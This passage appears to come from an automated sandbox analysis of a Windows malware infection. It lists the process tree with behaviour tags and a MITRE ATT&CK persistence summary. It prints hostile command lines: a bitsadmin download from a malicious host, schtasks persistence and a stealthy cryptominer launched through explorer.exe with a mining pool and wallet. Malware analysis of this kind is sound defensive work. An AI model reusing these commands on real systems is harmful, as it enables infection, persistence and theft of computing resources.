C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 3124⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\ABhgA1_JcNSjunWCJULBHWy2.exe"C:\Users\Admin\Documents\ABhgA1_JcNSjunWCJULBHWy2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\maeApavXFRVyTdV1Ikfwiplv.exe"C:\Users\Admin\Documents\maeApavXFRVyTdV1Ikfwiplv.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5328 -s 2404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\5VBfkYZvUYTuOQ4AHP9J6iE9.exe"C:\Users\Admin\Documents\5VBfkYZvUYTuOQ4AHP9J6iE9.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\5VBfkYZvUYTuOQ4AHP9J6iE9.exeC:\Users\Admin\Documents\5VBfkYZvUYTuOQ4AHP9J6iE9.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\KV7A28Kr66vqyPcOoBia8YpL.exe"C:\Users\Admin\Documents\KV7A28Kr66vqyPcOoBia8YpL.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 2404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\FkdTCM26AHjprP7cVvGtWYus.exe"C:\Users\Admin\Documents\FkdTCM26AHjprP7cVvGtWYus.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 2924⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\1qYRY02GWnuOYFefe_sWbDLj.exe"C:\Users\Admin\Documents\1qYRY02GWnuOYFefe_sWbDLj.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\1qYRY02GWnuOYFefe_sWbDLj.exe"C:\Users\Admin\Documents\1qYRY02GWnuOYFefe_sWbDLj.exe"4⤵
-
C:\Users\Admin\Documents\_MiKooJ7I6X_jN040tJwAo75.exe"C:\Users\Admin\Documents\_MiKooJ7I6X_jN040tJwAo75.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\4VhdBSLn5e31ry9R4lNsreSR.exe"C:\Users\Admin\Documents\4VhdBSLn5e31ry9R4lNsreSR.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\1xwHsYY6JY2X9HJMmqNaZyN_.exe"C:\Users\Admin\Documents\1xwHsYY6JY2X9HJMmqNaZyN_.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\FXxQSNcPioIFIlbegIsf_vj4.exe"C:\Users\Admin\Documents\FXxQSNcPioIFIlbegIsf_vj4.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\s9CZCVkwZnCKvuAXID9kjcGG.exe"C:\Users\Admin\Documents\s9CZCVkwZnCKvuAXID9kjcGG.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7036493.exe"C:\Users\Admin\AppData\Roaming\7036493.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4964 -s 23085⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\3529569.exe"C:\Users\Admin\AppData\Roaming\3529569.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\sDD53xiAFXf45j9jMPz5AqNg.exe"C:\Users\Admin\Documents\sDD53xiAFXf45j9jMPz5AqNg.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\kUZysLnJ5VU1GTZZD0uqlySQ.exe"C:\Users\Admin\Documents\kUZysLnJ5VU1GTZZD0uqlySQ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\kUZysLnJ5VU1GTZZD0uqlySQ.exe"C:\Users\Admin\Documents\kUZysLnJ5VU1GTZZD0uqlySQ.exe" -q4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\9avfIn5IigP_u4pj8JpAtsYA.exe"C:\Users\Admin\Documents\9avfIn5IigP_u4pj8JpAtsYA.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z4⤵
- Download via BitsAdmin
-
C:\Users\Admin\Documents\kGZKvxo6ms4BQ5U8cuw3ZTub.exe"C:\Users\Admin\Documents\kGZKvxo6ms4BQ5U8cuw3ZTub.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 2444⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\LSBnF4NXGH5rmUEXTqMKoFvs.exe"C:\Users\Admin\Documents\LSBnF4NXGH5rmUEXTqMKoFvs.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c VC_redist.x64.exe /install /quiet4⤵
-
C:\Users\Admin\Documents\VC_redist.x64.exeVC_redist.x64.exe /install /quiet5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c VC_redist.x86.exe /install /quiet4⤵
-
C:\Users\Admin\Documents\VC_redist.x86.exeVC_redist.x86.exe /install /quiet5⤵
-
C:\Windows\Temp\{B289DA0A-836C-4A8A-9DA1-4168C58199BA}\.cr\VC_redist.x86.exe"C:\Windows\Temp\{B289DA0A-836C-4A8A-9DA1-4168C58199BA}\.cr\VC_redist.x86.exe" -burn.clean.room="C:\Users\Admin\Documents\VC_redist.x86.exe" -burn.filehandle.attached=576 -burn.filehandle.self=584 /install /quiet6⤵
-
C:\Windows\Temp\{59B2F177-22F7-4427-AD66-990CDA6B21D9}\.be\VC_redist.x86.exe"C:\Windows\Temp\{59B2F177-22F7-4427-AD66-990CDA6B21D9}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{399B689F-8033-46E5-B5E3-289A96EBE609} {75AEF579-016F-4CB3-A9BE-3D80B684C0EC} 46607⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 8687⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\InstallShadowVPN.exe"C:\Users\Admin\AppData\Local\Temp\InstallShadowVPN.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-RJB75.tmp\installer.tmp"C:\Users\Admin\AppData\Local\Temp\is-RJB75.tmp\installer.tmp" /SL5="$6030C,1158062,843264,C:\Users\Admin\AppData\Local\Temp\installer.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 4925⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 13565⤵
- Program crash
-
C:\Users\Admin\Documents\n06BeJZiAJ9ZGyBXLy2bju0A.exe"C:\Users\Admin\Documents\n06BeJZiAJ9ZGyBXLy2bju0A.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-GIFT8.tmp\n06BeJZiAJ9ZGyBXLy2bju0A.tmp"C:\Users\Admin\AppData\Local\Temp\is-GIFT8.tmp\n06BeJZiAJ9ZGyBXLy2bju0A.tmp" /SL5="$202CC,138429,56832,C:\Users\Admin\Documents\n06BeJZiAJ9ZGyBXLy2bju0A.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-LM76P.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-LM76P.tmp\Setup.exe" /Verysilent5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-LTI9T.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-LTI9T.tmp\MediaBurner2.tmp" /SL5="$30308,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-UNCCA.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-UNCCA.tmp\3377047_logo_media.exe" /S /UID=burnerch28⤵
-
C:\Program Files\Windows NT\ZEVHKBCHQY\ultramediaburner.exe"C:\Program Files\Windows NT\ZEVHKBCHQY\ultramediaburner.exe" /VERYSILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KS6L5.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-KS6L5.tmp\ultramediaburner.tmp" /SL5="$90250,281924,62464,C:\Program Files\Windows NT\ZEVHKBCHQY\ultramediaburner.exe" /VERYSILENT10⤵
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu11⤵
-
C:\Users\Admin\AppData\Local\Temp\ec-91e8d-2f4-3d8a4-dbd8bdaa020ca\Mopimukoxe.exe"C:\Users\Admin\AppData\Local\Temp\ec-91e8d-2f4-3d8a4-dbd8bdaa020ca\Mopimukoxe.exe"9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e610⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a6471811⤵
-
C:\Users\Admin\AppData\Local\Temp\f0-47c04-84b-db29a-3783c8f0e7b9f\Qaevemishifu.exe"C:\Users\Admin\AppData\Local\Temp\f0-47c04-84b-db29a-3783c8f0e7b9f\Qaevemishifu.exe"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lgayu3ic.jk0\GcleanerEU.exe /eufive & exit10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f4ezw0of.tpb\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\f4ezw0of.tpb\installer.exeC:\Users\Admin\AppData\Local\Temp\f4ezw0of.tpb\installer.exe /qn CAMPAIGN="654"11⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\f4ezw0of.tpb\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\f4ezw0of.tpb\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628932158 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1lm122iq.23c\ufgaa.exe & exit10⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\od0fu1ax.ney\anyname.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\od0fu1ax.ney\anyname.exeC:\Users\Admin\AppData\Local\Temp\od0fu1ax.ney\anyname.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\od0fu1ax.ney\anyname.exe"C:\Users\Admin\AppData\Local\Temp\od0fu1ax.ney\anyname.exe" -q12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 79213⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\areua4by.v3l\gcleaner.exe /mixfive & exit10⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 2367⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"6⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 17927⤵
- Program crash
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit7⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --nicehash --tls --cinit-stealth8⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe" -a7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6891150.exe"C:\Users\Admin\AppData\Roaming\6891150.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7120 -s 22728⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\6280455.exe"C:\Users\Admin\AppData\Roaming\6280455.exe"7⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\6446650.exe"C:\Users\Admin\AppData\Roaming\6446650.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\5975108.exe"C:\Users\Admin\AppData\Roaming\5975108.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 23288⤵
- Program crash
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628932158 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"7⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 8PFJ7Xr/RkiQhw851r/usQ.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 4483⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4828 -ip 48281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4568 -ip 45681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5388 -ip 53881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5344 -ip 53441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5280 -ip 52801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5360 -ip 5360
- Process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5328 -ip 5328
  - Suspicious use of NtCreateProcessExOtherParentProcess
- Process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4112 -ip 4112
- Process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5632 -ip 5632
  - Suspicious use of NtCreateProcessExOtherParentProcess
- Process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5868 -ip 5868
  - Suspicious use of NtCreateProcessExOtherParentProcess
- Process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 1432 -ip 1432
- Process: C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
  - Modifies data under HKEY_USERS
- Process: C:\Windows\Temp\{CD37212B-4F5F-473E-978C-DF9ADC88A7A9}\.cr\VC_redist.x64.exe
  Command line: "C:\Windows\Temp\{CD37212B-4F5F-473E-978C-DF9ADC88A7A9}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\Admin\Documents\VC_redist.x64.exe" -burn.filehandle.attached=584 -burn.filehandle.self=580 /install /quiet
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
  - Process: C:\Windows\Temp\{B9B8ED8E-F0C5-482C-8C59-6CB7FA4773F1}\.be\VC_redist.x64.exe
    Command line: "C:\Windows\Temp\{B9B8ED8E-F0C5-482C-8C59-6CB7FA4773F1}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{D51149BE-F0A0-4B20-BBEA-5024E56AD5CD} {DC0B5AF9-C616-4544-A18F-83C2B15C0C72} 5648
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
  - Process: C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 1408
    - Program crash
- Process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5200 -ip 5200
  - Suspicious use of NtCreateProcessExOtherParentProcess
- Process: C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
- Process: C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Checks SCSI registry key(s)
  - Suspicious use of AdjustPrivilegeToken
- Process: C:\Windows\system32\WerFault.exe
  Command line: C:\Windows\system32\WerFault.exe -pss -s 672 -p 4964 -ip 4964
  - Suspicious use of NtCreateProcessExOtherParentProcess
- Process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5796 -ip 5796
  - Suspicious use of NtCreateProcessExOtherParentProcess
- Process: C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
  - Checks SCSI registry key(s)
- Process: C:\Windows\system32\rUNdlL32.eXe
  Command line: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  - Process spawned unexpected child process
  - Process: C:\Windows\SysWOW64\rundll32.exe
    Command line: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    - Loads dropped DLL
    - Process: C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 456
      - Program crash
- Process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5380 -ip 5380
- Process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5724 -ip 5724
- Process: C:\Windows\system32\srtasks.exe
  Command line: C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:5
- Process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5648 -ip 5648
- Process: C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  - Process: C:\Windows\syswow64\MsiExec.exe
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 3E5B60605DF948EA26B9487A719F4DEC C
  - Process: C:\Windows\syswow64\MsiExec.exe
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding F27C5DD74EAE78A12C670EA9177EE3C9
  - Process: C:\Windows\syswow64\MsiExec.exe
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 1F7F67D099579AFBE22A390550F72D7B C
- Process: C:\Windows\system32\WerFault.exe
  Command line: C:\Windows\system32\WerFault.exe -pss -s 652 -p 7120 -ip 7120
- Process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5096 -ip 5096
- Process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4660 -ip 4660
- Process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 7024 -ip 7024
- Process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 7024 -ip 7024
- Process: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 1492 -ip 1492
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
